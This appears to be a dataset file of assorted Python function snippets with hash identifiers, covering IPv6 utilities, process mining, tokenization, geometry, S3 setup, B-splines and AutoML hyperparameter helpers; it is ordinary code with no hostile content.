| 20,163 |
import socket
def in6_isincluded(addr, prefix, plen):
"""
Returns True when 'addr' belongs to prefix/plen. False otherwise.
"""
temp = inet_pton(socket.AF_INET6, addr)
pref = in6_cidr2mask(plen)
zero = inet_pton(socket.AF_INET6, prefix)
return zero == in6_and(temp, pref)
|
4003d9b61ddb8f37207a2d332a31e4ee3a97cad7
| 20,164 |
def vis_channel(model, layer, channel_n):
"""
This function creates a visualization for a single channel in a layer
:param model: model we are visualizing
:type model: lucid.modelzoo
:param layer: the name of the layer we are visualizing
:type layer: string
:param channel_n: The channel number in the layer we are optimizing for
:type channel_n: int
:return: array of pixel values for the visualization
"""
print('Getting vis for ' + layer + ', channel ' + str(channel_n))
l_name = dla_lucid.LAYERS[layer][0]
obj = objectives.channel(l_name, channel_n)
imgs = render.render_vis(model, obj, dla_lucid.PARAM_1D,
thresholds=dla_lucid.THRESH_1D, transforms=dla_lucid.TFORMS_1D, verbose=False)
imgs_array = np.array(imgs)
imgs_reshaped = imgs_array.reshape(400)
return imgs_reshaped
|
b6f1b72be81fa317fc59b3582b9f43afb640a4d6
| 20,165 |
from typing import Tuple
import time
def processing(log: EventLog, causal: Tuple[str, str], follows: Tuple[str, str]):
"""
Applying the Alpha Miner with the new relations
Parameters
-------------
log
Filtered log
causal
Pairs that have a causal relation (->)
follows
Pairs that have a follow relation (>)
Returns
-------------
net
Petri net
im
Initial marking
fm
Final marking
"""
# create list of all events
labels = set()
start_activities = set()
end_activities = set()
for trace in log:
start_activities.add(trace.__getitem__(0))
end_activities.add(trace.__getitem__(len(trace) - 1))
for events in trace:
labels.add(events)
labels = list(labels)
pairs = []
for key, element in causal.items():
for item in element:
if get_sharp_relation(follows, key, key):
if get_sharp_relation(follows, item, item):
pairs.append(({key}, {item}))
# combining pairs
for i in range(0, len(pairs)):
t1 = pairs[i]
for j in range(i, len(pairs)):
t2 = pairs[j]
if t1 != t2:
if t1[0].issubset(t2[0]) or t1[1].issubset(t2[1]):
if get_sharp_relations_for_sets(follows, t1[0], t2[0]) and get_sharp_relations_for_sets(follows,
t1[1],
t2[1]):
new_alpha_pair = (t1[0] | t2[0], t1[1] | t2[1])
if new_alpha_pair not in pairs:
pairs.append((t1[0] | t2[0], t1[1] | t2[1]))
# maximize pairs
cleaned_pairs = list(filter(lambda p: __pair_maximizer(pairs, p), pairs))
# create transitions
net = PetriNet('alpha_plus_net_' + str(time.time()))
label_transition_dict = {}
for label in labels:
if label != 'artificial_start' and label != 'artificial_end':
label_transition_dict[label] = PetriNet.Transition(label, label)
net.transitions.add(label_transition_dict[label])
else:
label_transition_dict[label] = PetriNet.Transition(label, None)
net.transitions.add(label_transition_dict[label])
# and source and sink
src = add_source(net, start_activities, label_transition_dict)
sink = add_sink(net, end_activities, label_transition_dict)
# create places
for pair in cleaned_pairs:
place = PetriNet.Place(str(pair))
net.places.add(place)
for in_arc in pair[0]:
add_arc_from_to(label_transition_dict[in_arc], place, net)
for out_arc in pair[1]:
add_arc_from_to(place, label_transition_dict[out_arc], net)
return net, Marking({src: 1}), Marking({sink: 1}), cleaned_pairs
|
5841c82462432edddddf1b0dfd965b1043bc7277
| 20,166 |
from typing import List
import re
def word_tokenize(string: str, language: str = "english") -> List[str]:
"""tokenizes a given string into a list of substrings.
:param string: String to tokenize.
:param language: Language. Either one of ``english'' or ``german''.
"""
if language not in ["english", "german"]:
raise ValueError("language argument has to be either ``english'' or ``german''")
# excessive whitespaces
string = re.sub(r"\s+", " ", string)
# some unicode characters
string = string.replace("’", "'")
string = string.replace("”", '"')
string = string.replace("“", '"')
# floating point (e.g., 1.3 => 1.3)
string = re.sub(r"(\d+)\.(\d+)", r"\g<1>._\g<2>", string)
# percentage (e.g., below.500 => below .500)
string = re.sub(r"(\w+)\.(\d+)", r"\g<1> ._\g<2>", string)
# end of quote
string = string.replace(".``", ". ``")
# number with apostrophe (e.g. '90)
string = re.sub(r"\s'(\d+)", r"' \g<1>", string)
# names with Initials (e.g. C. J. Miles)
string = re.sub(r"(^|\s)(\w)\. (\w)\.", r"\g<1>\g<2>._ \g<3>._", string)
# some dots
string = string.replace("..", " ..")
# names with apostrophe => expands temporarily
string = re.sub(r"\w+'(?!d|s|ll|t|re|ve|\s)", r"\g<0>_", string)
# win-loss scores (German notation seems to be XX:YY, but this is also the time format,
# and the times are not tokenized in the original RotoWire. So we manually handle XX:YY
# expression.
string = re.sub(r"(\d+)-(\d+)", r"\g<1> - \g<2>", string)
string = re.sub(r"(\d+)-of-(\d+)", r"\g<1> - of - \g<2>", string)
# actual tokenization
tokenized = nltk.word_tokenize(string, language=language)
joined = " ".join(tokenized)
# shrink expanded name-with-apostrophe expressions
joined = joined.replace("'_", "'")
# shrink expanded name-with-initial expressions
joined = joined.replace("._", ".")
tokenized = joined.split(" ")
return tokenized
|
00cb30031fc5a9e7ddbfcffeae9fad031f463cb3
| 20,167 |
import re
import sys
def get_project_id(file_name):
""" Extracts project ID from intput BAM filename.
:param file_name: string e.g. "/PITT_0452_AHG2THBBXY_A1___P10344_C___13_cf_IGO_10344_C_20___hg19___MD.bam"
:return: string e.g. "P10344_C"
"""
regex = "(?<=___)P[0-9]{5}[_A-Z,a-z]*(?=___)" # Valid project ID is "P" + 5 numbers + (optional) [ "_" + 2 letters]
matches = re.findall(regex, file_name)
if len(matches) == 0:
print("ERROR: Could not find IGO ID in filename: %s with regex: \"%s\"" % (file_name, regex))
sys.exit(1)
if len(matches) > 1:
print("WARNING: More than one match: %s" % str(matches))
return matches[0]
|
fea6447851aa3b0fe0983db28e3f7707f315063a
| 20,168 |
import torch
def modify_scaffolds_with_coords(scaffolds, coords):
""" Gets scaffolds and fills in the right data.
Inputs:
* scaffolds: dict. as returned by `build_scaffolds_from_scn_angles`
* coords: (L, 14, 3). sidechainnet tensor. same device as scaffolds
Outputs: corrected scaffolds
"""
# calculate distances and update:
# N, CA, C
scaffolds["bond_mask"][1:, 0] = torch.norm(coords[1:, 0] - coords[:-1, 2], dim=-1) # N
scaffolds["bond_mask"][ :, 1] = torch.norm(coords[ :, 1] - coords[: , 0], dim=-1) # CA
scaffolds["bond_mask"][ :, 2] = torch.norm(coords[ :, 2] - coords[: , 1], dim=-1) # C
# O, CB, side chain
selector = np.arange(len(coords))
for i in range(3, 14):
# get indexes
idx_a, idx_b, idx_c = scaffolds["point_ref_mask"][:, :, i-3] # (3, L, 11) -> 3 * (L, 11)
# correct distances
scaffolds["bond_mask"][:, i] = torch.norm(coords[:, i] - coords[selector, idx_c], dim=-1)
# get angles
scaffolds["angles_mask"][0, :, i] = get_angle(coords[selector, idx_b],
coords[selector, idx_c],
coords[:, i])
# handle C-beta, where the C requested is from the previous aa
if i == 4:
# for 1st residue, use position of the second residue's N
first_next_n = coords[1, :1] # 1, 3
# the c requested is from the previous residue
main_c_prev_idxs = coords[selector[:-1], idx_a[1:]]# (L-1), 3
# concat
coords_a = torch.cat([first_next_n, main_c_prev_idxs])
else:
coords_a = coords[selector, idx_a]
# get dihedrals
scaffolds["angles_mask"][1, :, i] = get_dihedral(coords_a,
coords[selector, idx_b],
coords[selector, idx_c],
coords[:, i])
# correct angles and dihedrals for backbone
scaffolds["angles_mask"][0, :-1, 0] = get_angle(coords[:-1, 1], coords[:-1, 2], coords[1: , 0]) # ca_c_n
scaffolds["angles_mask"][0, 1:, 1] = get_angle(coords[:-1, 2], coords[1:, 0], coords[1: , 1]) # c_n_ca
scaffolds["angles_mask"][0, :, 2] = get_angle(coords[:, 0], coords[ :, 1], coords[ : , 2]) # n_ca_c
# N determined by previous psi = f(n, ca, c, n+1)
scaffolds["angles_mask"][1, :-1, 0] = get_dihedral(coords[:-1, 0], coords[:-1, 1], coords[:-1, 2], coords[1:, 0])
# CA determined by omega = f(ca, c, n+1, ca+1)
scaffolds["angles_mask"][1, 1:, 1] = get_dihedral(coords[:-1, 1], coords[:-1, 2], coords[1:, 0], coords[1:, 1])
# C determined by phi = f(c-1, n, ca, c)
scaffolds["angles_mask"][1, 1:, 2] = get_dihedral(coords[:-1, 2], coords[1:, 0], coords[1:, 1], coords[1:, 2])
return scaffolds
|
6d0853c3749fbf251cb3147109dab8951603c99c
| 20,169 |
import pickle
from .stem import _classification_textcleaning_stemmer
def multinomial(**kwargs):
"""
Load multinomial toxicity model.
Parameters
----------
validate: bool, optional (default=True)
if True, malaya will check model availability and download if not available.
Returns
-------
BAYES : malaya._models._sklearn_model.MULTILABEL_BAYES class
"""
check_file(
PATH_TOXIC['multinomial'], S3_PATH_TOXIC['multinomial'], **kwargs
)
try:
with open(PATH_TOXIC['multinomial']['model'], 'rb') as fopen:
multinomial = pickle.load(fopen)
with open(PATH_TOXIC['multinomial']['vector'], 'rb') as fopen:
vectorize = pickle.load(fopen)
except:
raise Exception(
"model corrupted due to some reasons, please run malaya.clear_cache('toxic/multinomial') and try again"
)
return MULTILABEL_BAYES(
models = multinomial,
vectors = vectorize,
cleaning = _classification_textcleaning_stemmer,
)
|
78bb3ceffefd6b38c304758eda8c0bafe36462ab
| 20,170 |
import logging
def create_bucket(bucket_name, region="us-west-2"):
"""Create an S3 bucket in a specified region
:param bucket_name: Bucket to create
:param region: String region to create bucket in, e.g., 'us-west-2'
:return: True if bucket created, else False
"""
# Create bucket
try:
# get list of existing buckets
s3_client = boto3.client('s3', region_name=region)
list_buckets = s3_client.list_buckets()
for bucket in list_buckets['Buckets']:
if bucket["Name"] == bucket_name:
print("------- Bucket already exists")
return s3_client
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
return s3_client
except ClientError as e:
logging.error(e)
return
|
c2d655982563c233a027dc94f9b73e8899aeddb7
| 20,171 |
def create_client():
"""Return a client socket that may be connected to a remote address."""
return _new_sock()
|
5d0515c731d4c087c7b118923aa579d4bcd1e881
| 20,172 |
import warnings
import copy
def derivative_surface(obj):
""" Computes the hodograph (first derivative) surface of the input surface.
This function constructs the hodograph (first derivative) surface from the input surface by computing the degrees,
knot vectors and the control points of the derivative surface.
The return value of this function is a tuple containing the following derivative surfaces in the given order:
* U-derivative surface (derivative taken only on the u-direction)
* V-derivative surface (derivative taken only on the v-direction)
* UV-derivative surface (derivative taken on both the u- and the v-direction)
:param obj: input surface
:type obj: abstract.Surface
:return: derivative surfaces w.r.t. u, v and both u-v
:rtype: tuple
"""
if not isinstance(obj, abstract.Surface):
raise TypeError("Input shape must be an instance of abstract.Surface class")
if obj.rational:
warnings.warn("Cannot compute hodograph surface for a rational surface")
return obj
# Find the control points of the derivative surface
d = 2 # 0 <= k + l <= d, see pg. 114 of The NURBS Book, 2nd Ed.
pkl = evaluators.SurfaceEvaluator2.derivatives_ctrlpts(r1=0, r2=obj.ctrlpts_size_u - 1,
s1=0, s2=obj.ctrlpts_size_v - 1,
degree_u=obj.degree_u, degree_v=obj.degree_v,
ctrlpts_size_u=obj.ctrlpts_size_u,
ctrlpts_size_v=obj.ctrlpts_size_v,
knotvector_u=obj.knotvector_u, knotvector_v=obj.knotvector_v,
ctrlpts=obj.ctrlpts2d,
dimension=obj.dimension,
deriv_order=d)
ctrlpts2d_u = []
for i in range(0, len(pkl[1][0]) - 1):
ctrlpts2d_u.append(pkl[1][0][i])
surf_u = copy.deepcopy(obj)
surf_u.degree_u = obj.degree_u - 1
surf_u.ctrlpts2d = ctrlpts2d_u
surf_u.knotvector_u = obj.knotvector_u[1:-1]
surf_u.delta = obj.delta
ctrlpts2d_v = []
for i in range(0, len(pkl[0][1])):
ctrlpts2d_v.append(pkl[0][1][i][0:-1])
surf_v = copy.deepcopy(obj)
surf_v.degree_v = obj.degree_v - 1
surf_v.ctrlpts2d = ctrlpts2d_v
surf_v.knotvector_v = obj.knotvector_v[1:-1]
surf_v.delta = obj.delta
ctrlpts2d_uv = []
for i in range(0, len(pkl[1][1]) - 1):
ctrlpts2d_uv.append(pkl[1][1][i][0:-1])
# Generate the derivative curve
surf_uv = obj.__class__()
surf_uv.degree_u = obj.degree_u - 1
surf_uv.degree_v = obj.degree_v - 1
surf_uv.ctrlpts2d = ctrlpts2d_uv
surf_uv.knotvector_u = obj.knotvector_u[1:-1]
surf_uv.knotvector_v = obj.knotvector_v[1:-1]
surf_uv.delta = obj.delta
return surf_u, surf_v, surf_uv
|
f9b846c0b2b17e315ae4b98138719361675df557
| 20,173 |
def configure(config):
"""
| [bing ] | example | purpose |
| -------- | ------- | ------- |
| api_key | VBsdaiY23sdcxuNG1gP+YBsCwJxzjfHgdsXJG5 | Bing Primary Account Key |
"""
chunk = ''
if config.option('Configuring bing search module', False):
config.interactive_add('bing', 'api_key', 'Bing Primary Account Key', '')
return chunk
|
87ccd4694cfbf34d24e6e31f2b485aaa465ba68b
| 20,174 |
def CVRMSE(ip1,ip2):
""" The normalized RMSE (= Root Mean Square Error) is defined as CVRMSE(X,Y) = sqrt[ sum_i(Yi-Xi)^2 / N ] / mean(Yi) ) """
stats = ip1.getStatistics()
return RMSE(ip1,ip2) / stats.mean
|
0981637da92d2a60c6281f216587fa5bc798d554
| 20,175 |
def get_verified_aid_pairs(ibs):
"""
Example:
>>> # DISABLE_DOCTEST
>>> from wbia_cnn._plugin import * # NOQA
>>> import wbia
>>> ibs = wbia.opendb('NNP_Master3', allow_newdir=True)
>>> verified_aid1_list, verified_aid2_list = get_verified_aid_pairs(ibs)
"""
# Grab marked hard cases
am_rowids = ibs._get_all_annotmatch_rowids()
remove_photobombs = True
if remove_photobombs:
flags = ibs.get_annotmatch_is_photobomb(am_rowids)
am_rowids = ut.filterfalse_items(am_rowids, flags)
verified_aid1_list = ibs.get_annotmatch_aid1(am_rowids)
verified_aid2_list = ibs.get_annotmatch_aid2(am_rowids)
return verified_aid1_list, verified_aid2_list
|
91eb788a6b1f781e5796b03f56292a807aaee60d
| 20,176 |
def audio_sort_key(ex):
"""Sort using duration time of the sound spectrogram."""
return ex.src.size(1)
|
ec940df6bf2b74962f221b84717f51beba5c4f5f
| 20,177 |
from pathlib import Path
def _filename_to_title(filename, split_char="_"):
"""Convert a file path into a more readable title."""
filename = Path(filename).with_suffix("").name
filename_parts = filename.split(split_char)
try:
# If first part of the filename is a number for ordering, remove it
int(filename_parts[0])
if len(filename_parts) > 1:
filename_parts = filename_parts[1:]
except Exception:
pass
title = " ".join(ii.capitalize() for ii in filename_parts)
return title
|
f62ae56901f0a58e53e84e63423bcb9f2ccf4c5a
| 20,178 |
def basis_function_contributions(universe, mo, mocoefs='coef',
tol=0.01, ao=None, frame=0):
"""
Provided a universe with momatrix and basis_set_order attributes,
return the major basis function contributions of a particular
molecular orbital.
.. code-block:: python
# display the 16th orbital coefficients > abs(0.15)
basis_function_contributions(uni, 15, tol=0.15) # 0-based indexing!
Args:
universe (class:`exatomic.core.universe.Universe`): a universe
mo (int): molecular orbital index
mocoefs (str): column of interest in universe.momatrix
tol (float): minimum value of coefficient by which to filter
frame (int): frame of the universe (default is zero)
Returns:
joined (pd.DataFrame): a join of momatrix and basis_set_order
"""
small = universe.momatrix.contributions(mo, tol=tol, mocoefs=mocoefs, frame=frame)
chis = small['chi'].values
coefs = small[mocoefs]
coefs.index = chis
joined = pd.concat([universe.basis_set_order.ix[chis], coefs], axis=1)
if ao is None:
return joined
else:
raise NotImplementedError("not clever enough for that.")
|
afe695d15d3aa43baae0ce7e0dcf2fb84f53c699
| 20,179 |
from re import S
def bspline_basis(d, knots, n, x, close=True):
"""The `n`-th B-spline at `x` of degree `d` with knots.
B-Splines are piecewise polynomials of degree `d` [1]_. They are defined on
a set of knots, which is a sequence of integers or floats.
The 0th degree splines have a value of one on a single interval:
>>> from sympy import bspline_basis
>>> from sympy.abc import x
>>> d = 0
>>> knots = range(5)
>>> bspline_basis(d, knots, 0, x)
Piecewise((1, And(x <= 1, x >= 0)), (0, True))
For a given ``(d, knots)`` there are ``len(knots)-d-1`` B-splines defined, that
are indexed by ``n`` (starting at 0).
Here is an example of a cubic B-spline:
>>> bspline_basis(3, range(5), 0, x)
Piecewise((x**3/6, And(x < 1, x >= 0)),
(-x**3/2 + 2*x**2 - 2*x + 2/3, And(x < 2, x >= 1)),
(x**3/2 - 4*x**2 + 10*x - 22/3, And(x < 3, x >= 2)),
(-x**3/6 + 2*x**2 - 8*x + 32/3, And(x <= 4, x >= 3)),
(0, True))
By repeating knot points, you can introduce discontinuities in the
B-splines and their derivatives:
>>> d = 1
>>> knots = [0,0,2,3,4]
>>> bspline_basis(d, knots, 0, x)
Piecewise((-x/2 + 1, And(x <= 2, x >= 0)), (0, True))
It is quite time consuming to construct and evaluate B-splines. If you
need to evaluate a B-splines many times, it is best to lambdify them
first:
>>> from sympy import lambdify
>>> d = 3
>>> knots = range(10)
>>> b0 = bspline_basis(d, knots, 0, x)
>>> f = lambdify(x, b0)
>>> y = f(0.5)
See Also
========
bsplines_basis_set
References
==========
.. [1] http://en.wikipedia.org/wiki/B-spline
"""
knots = [sympify(k) for k in knots]
d = int(d)
n = int(n)
n_knots = len(knots)
n_intervals = n_knots - 1
if n + d + 1 > n_intervals:
raise ValueError('n + d + 1 must not exceed len(knots) - 1')
if d == 0:
result = Piecewise(
(S.One, Interval(knots[n], knots[n + 1], False,
not close).contains(x)),
(0, True)
)
elif d > 0:
denom = knots[n + d + 1] - knots[n + 1]
if denom != S.Zero:
B = (knots[n + d + 1] - x)/denom
b2 = bspline_basis(d - 1, knots, n + 1, x, close)
else:
b2 = B = S.Zero
denom = knots[n + d] - knots[n]
if denom != S.Zero:
A = (x - knots[n])/denom
b1 = bspline_basis(
d - 1, knots, n, x, close and (B == S.Zero or b2 == S.Zero))
else:
b1 = A = S.Zero
result = _add_splines(A, b1, B, b2)
else:
raise ValueError('degree must be non-negative: %r' % n)
return result
|
266a8ef3176e11cc598015ebb963c13ddcee9e31
| 20,180 |
def is_versioned(obj):
"""
Check if a given object is versioned by inspecting some of its attributes.
"""
# before any heuristic, newer versions of RGW will tell if an obj is
# versioned so try that first
if hasattr(obj, 'versioned'):
return obj.versioned
if not hasattr(obj, 'VersionedEpoch'):
# overly paranoid here, an object that is not versioned should *never*
# have a `VersionedEpoch` attribute
if getattr(obj, 'version_id', None):
if obj.version_id is None:
return False
return True # probably will never get here
return False
return True
|
7f5ad90ffce6a8efde50dba47cdc63673ec79f60
| 20,181 |
def preprocess_and_suggest_hyperparams(
task,
X,
y,
estimator_or_predictor,
location=None,
):
"""Preprocess the data and suggest hyperparameters.
Example:
```python
hyperparams, estimator_class, X, y, feature_transformer, label_transformer = \
preprocess_and_suggest_hyperparams("classification", X_train, y_train, "xgb_limitdepth")
model = estimator_class(**hyperparams) # estimator_class is XGBClassifier
model.fit(X, y)
X_test = feature_transformer.transform(X_test)
y_pred = label_transformer.inverse_transform(pd.Series(model.predict(X_test).astype(int)))
```
Args:
task: A string of the task type, e.g.,
'classification', 'regression', 'ts_forecast', 'rank',
'seq-classification', 'seq-regression'.
X: A dataframe of training data in shape n*m.
For 'ts_forecast' task, the first column of X_train
must be the timestamp column (datetime type). Other
columns in the dataframe are assumed to be exogenous
variables (categorical or numeric).
y: A series of labels in shape n*1.
estimator_or_predictor: A str of the learner name or a dict of the learned config predictor.
"choose_xgb" means choosing between xgb_limitdepth and xgboost.
If a dict, it contains:
- "version": a str of the version number.
- "preprocessing": a dictionary containing:
* "center": a list of meta feature value offsets for normalization.
* "scale": a list of meta feature scales to normalize each dimension.
- "neighbors": a list of dictionaries. Each dictionary contains:
* "features": a list of the normalized meta features for a neighbor.
* "choice": a integer of the configuration id in the portfolio.
- "portfolio": a list of dictionaries, each corresponding to a configuration:
* "class": a str of the learner name.
* "hyperparameters": a dict of the config. They key "FLAML_sample_size" will be ignored.
location: (Optional) A str of the location containing mined portfolio file.
Only valid when the portfolio is a str, by default the location is flaml/default.
Returns:
hyperparams: A dict of the hyperparameter configurations.
estiamtor_class: A class of the underlying estimator, e.g., lightgbm.LGBMClassifier.
X: the preprocessed X.
y: the preprocessed y.
feature_transformer: a data transformer that can be applied to X_test.
label_transformer: a label transformer that can be applied to y_test.
"""
dt = DataTransformer()
X, y = dt.fit_transform(X, y, task)
if "choose_xgb" == estimator_or_predictor:
# choose between xgb_limitdepth and xgboost
estimator_or_predictor = suggest_learner(
task,
X,
y,
estimator_list=["xgb_limitdepth", "xgboost"],
location=location,
)
config = suggest_config(task, X, y, estimator_or_predictor, location=location, k=1)[
0
]
estimator = config["class"]
model_class = get_estimator_class(task, estimator)
hyperparams = config["hyperparameters"]
model = model_class(task=task, **hyperparams)
if model.estimator_class is None:
return hyperparams, model_class, X, y, None, None
else:
estimator_class = model.estimator_class
X = model._preprocess(X)
hyperparams = hyperparams and model.params
class AutoMLTransformer:
def transform(self, X):
return model._preprocess(dt.transform(X))
transformer = AutoMLTransformer()
return hyperparams, estimator_class, X, y, transformer, dt.label_transformer
|
cd388bea6c9bfbb5d38001c549f2fe92d16aff41
| 20,182 |
def passphrase_from_private_key(private_key):
"""Return passphrase from provided private key."""
return mnemonic.from_private_key(private_key)
|
aed1c465795d22fd80680c0484d377fa6cabf0c8
| 20,183 |
def merge_on_empty_fields(base, tomerge):
"""Utility to quickly fill empty or falsy field of $base with fields
of $tomerge
"""
has_merged_anything = False
for key in tomerge:
if not base.get(key):
base[key] = tomerge.get(key)
has_merged_anything = True
return has_merged_anything
|
f8cb14047d2e17e2155beb1ab86eab7cdf531af0
| 20,184 |
def clear_rows(grid, locked):
"""Deletes the row, if that row is filled."""
increment = 0
for i in range(len(grid) - 1, -1, -1):
row = grid[i]
if (0, 0, 0) not in row:
increment += 1
index = i
for j in range(len(row)):
try:
del locked[(j, i)]
except:
continue
if increment > 0:
for key in sorted(list(locked), key=lambda x: x[1])[::-1]:
x, y = key
if y < index:
newKey = (x, y + increment)
locked[newKey] = locked.pop(key)
return increment * 1.5
|
5974a129ac0bb756ee1038f61c9eeaf625ccbb72
| 20,185 |
import shlex
def call(cmd_args, suppress_output=False):
""" Call an arbitary command and return the exit value, stdout, and stderr as a tuple
Command can be passed in as either a string or iterable
>>> result = call('hatchery', suppress_output=True)
>>> result.exitval
0
>>> result = call(['hatchery', 'notreal'])
>>> result.exitval
1
"""
if not funcy.is_list(cmd_args) and not funcy.is_tuple(cmd_args):
cmd_args = shlex.split(cmd_args)
logger.info('executing `{}`'.format(' '.join(cmd_args)))
call_request = CallRequest(cmd_args, suppress_output=suppress_output)
call_result = call_request.run()
if call_result.exitval:
logger.error('`{}` returned error code {}'.format(' '.join(cmd_args), call_result.exitval))
return call_result
|
1556d52de9d620e74c8a4b946c3120cf3579dede
| 20,186 |
def provides(interface):
"""
A validator that raises a :exc:`TypeError` if the initializer is called
with an object that does not provide the requested *interface* (checks are
performed using ``interface.providedBy(value)`` (see `zope.interface
<http://docs.zope.org/zope.interface/>`_).
:param interface: The interface to check for.
:type interface: zope.interface.Interface
The :exc:`TypeError` is raised with a human readable error message, the
attribute (of type :class:`attr.Attribute`), the expected interface, and
the value it got.
"""
return _ProvidesValidator(interface)
|
9b6e29aa8c3e0a1757daa1c0f3eb455ec66fa594
| 20,187 |
def v_t(r):
"""
Mean thermal velocity
"""
return (8/np.pi)**0.5*c(r)
|
af475d1376a549abe501b7b47e5f9fa35d8258c1
| 20,188 |
from typing import Callable
from typing import cast
def _state_stateful_alarm_controller(
select_state: Callable[[str], OverkizStateType]
) -> str:
"""Return the state of the device."""
if state := cast(str, select_state(OverkizState.CORE_ACTIVE_ZONES)):
# The Stateful Alarm Controller has 3 zones with the following options:
# (A, B, C, A,B, B,C, A,C, A,B,C). Since it is not possible to map this to AlarmControlPanel entity,
# only the most important zones are mapped, other zones can only be disarmed.
if state in MAP_CORE_ACTIVE_ZONES:
return MAP_CORE_ACTIVE_ZONES[state]
return STATE_ALARM_ARMED_CUSTOM_BYPASS
return STATE_ALARM_DISARMED
|
3663d8dda26586dae416ce6d5dbe55fafdb821c8
| 20,189 |
def _connect_new_volume(module, array, answer=False):
"""Connect volume to host"""
api_version = array._list_available_rest_versions()
if AC_REQUIRED_API_VERSION in api_version and module.params['lun']:
try:
array.connect_host(module.params['host'],
module.params['volume'],
lun=module.params['lun'])
answer = True
except Exception:
module.fail_json(msg='LUN ID {0} invalid. Check for duplicate LUN IDs.'.format(module.params['lun']))
else:
array.connect_host(module.params['host'], module.params['volume'])
answer = True
return answer
|
f6b5dea4e78f832b536fdc269dfe1b9c040cb9b7
| 20,190 |
def is_mongo_configured(accessor):
"""
works out if mongodb is configured to run with trackerdash
i.e. first time running
"""
return accessor.verify_essential_collections_present()
|
c0487f6d899e6cee4f6bbb31bffbd17890812c30
| 20,191 |
from cms.api import add_plugin
def create_default_children_plugins(request, placeholder, lang, parent_plugin, children_conf):
"""
Create all default children plugins in the given ``placeholder``.
If a child have children, this function recurse.
Return all children and grandchildren (etc.) created
"""
children = list()
grandchildren = list()
for conf in children_conf:
if not permissions.has_plugin_permission(request.user, conf['plugin_type'], "add"):
continue
plugin = add_plugin(placeholder, conf['plugin_type'], lang, **conf['values'])
plugin.parent = parent_plugin
plugin.save()
if 'children' in conf:
grandchildren+= create_default_children_plugins(request, placeholder, lang, plugin, conf['children'])
plugin.notify_on_autoadd(request, conf)
children.append(plugin)
parent_plugin.notify_on_autoadd_children(request, conf, children)
return children + grandchildren
|
121106100c50d7ebdace254b711e6d31611dbf3d
| 20,192 |
import sympy
import math
def _split_value_equally(delta, count):
"""Splits an integer or rational into roughly equal parts."""
numer = sympy.numer(delta)
denom = sympy.denom(delta)
return [int(math.floor((numer + i) / count)) / denom for i in range(count)]
|
e241444100b2e0f3c1a589d87c41aa8710fe5b8e
| 20,193 |
import ast
def maybe_get_docstring(node: ast.AST):
"""Get docstring from a constant expression, or return None."""
if (
isinstance(node, ast.Expr)
and isinstance(node.value, ast.Constant)
and isinstance(node.value.value, str)
):
return node.value.value
elif (
isinstance(node, ast.Expr)
and isinstance(node.value, ast.Str)
):
return node.value.s
|
23171c739f3c9ae6d62ecf3307ac7c3409852d6b
| 20,194 |
import logging
def part_work(NPCorpsList):
"""获取军团LP兑换物品及其信息
Args:
NPCorpList: NPC军团id列表
Returns:
NPCorpList: 可以兑换物品的NPC军团id列表
[123,124,125...244,245,246]
NPCorps: 可以兑换物品的NPC军团信息字典,key为id
[
'物品id': {
'info': {
"ceo_id": 3004049,
"corporation_description": "",
"corporation_name": "CBD社团",
"creator_id": 1,
"member_count": 0,
"tax_rate": 0,
"ticker": "CBDC",
"url": "None"
},
'lp_store': {
"isk_cost": 2400000,
"lp_cost": 2400,
"offer_id": 3584,
"quantity": 5000,
"required_items": [
{
"quantity": 5000,
"type_id": 234
}
],
"type_id": 23047
},
}
]
names: 物品信息字典,key为id
{
"23047": {
"category": "inventory_type",
"id": 23047,
"name": "加达里海军铅质轨道弹 L",
"jita": {
"all": {
"max": 30000000,
"min": 0.01,
"volume": 8102161635
},
"buy": {
"max": 14.86,
"min": 0.01,
"volume": 2893652791
},
"sell": {
"max": 30000000,
"min": 15.23,
"volume": 5208508844
}
}
}
}
"""
NPCorpsList, NPCorps, ids_list = getCorp(NPCorpsList)
if 0 == len(ids_list) or 0 == len(NPCorpsList):
return None, None, None
try:
Names = []
for i in range(0, len(ids_list), 255):
Names += getCHName(ids_list[i: min(i + 255, len(ids_list))])
except Exception as E:
logging.error(E)
return None, None, None
logging.info("get Chinese Name Successed!")
names = {}
for name in Names:
try:
name["jita"] = getValue(name["id"])
except Exception as E:
logging.error(E)
else:
names["{}".format(name["id"])] = name
logging.info("get Jita Market Successed!")
return NPCorpsList, NPCorps, names
|
96e85555a5aa74c6f065c897938ffd4c6d970739
| 20,195 |
def read_metadata(image_dir_path):
"""Read image metadata from an image directory."""
return jsons.load_dataobject(
ImageMetadata, _get_metadata_path(image_dir_path)
)
|
132306a228550ebff155d83e3c3d5020aad0263a
| 20,196 |
def subtract(list_1, list_2):
"""Subtracts list_2 from list_1 even if they are different lengths.
Length of the returned list will be the length of the shortest list supplied.
Index 0 is treated as the oldest, and the older list items are truncated.
Args:
list_1 (list of float): List to be subtracted from
list_2 (list of float): List to subtract
Returns:
list of float: result of list_1 - list_2
"""
offset = len(list_1) - len(list_2)
return list(np.array(list_1[offset:]) - np.array(list_2))
|
e41b02a6875ea971ffded30f82b1b51bcd33b9e8
| 20,197 |
def get_available_time_slots() -> list:
"""
An application is ready for scheduling when all the payment rules are satisfied plus:
- the application has been paid
- the window to schedule the review has not elapsed
"""
return [
{"try": middleware.create_correlation_id, "fail": []},
{"try": middleware.determine_current_datetime, "fail": []},
{"try": middleware.clean_prohibition_number, "fail": []},
{"try": middleware.validate_prohibition_number, "fail": []},
{"try": middleware.get_vips_status, "fail": []},
{"try": middleware.prohibition_exists_in_vips, "fail": []},
{"try": middleware.user_submitted_last_name_matches_vips, "fail": []},
{"try": middleware.application_has_been_saved_to_vips, "fail": []},
{"try": middleware.get_payment_status, "fail": []},
{"try": middleware.received_valid_payment_status, "fail": []},
{"try": middleware.paid_not_more_than_24hrs_ago, "fail": []},
{"try": middleware.application_has_been_paid, "fail": []},
{"try": middleware.review_has_not_been_scheduled, "fail": []},
{"try": middleware.get_application_details, "fail": []},
{"try": middleware.valid_application_received_from_vips, "fail": []},
{"try": middleware.get_invoice_details, "fail": []},
{"try": middleware.calculate_schedule_window, "fail": []},
{"try": middleware.query_review_times_available, "fail": []},
{"try": middleware.does_applicant_have_enough_review_options, "fail": [
{"try": middleware.query_for_additional_review_times, "fail": []},
{"try": middleware.does_applicant_have_enough_review_options, "fail": [
{"try": rsi_email.insufficient_reviews_available, "fail": []},
]}
]},
]
|
9e04168f908abd0a9c37c969769477fc04cbd805
| 20,198 |
def library_detail(request, lib_id):
"""
Display information about all the flowcells a library has been run on.
"""
lib = get_object_or_404(Library, id=lib_id)
flowcell_list = []
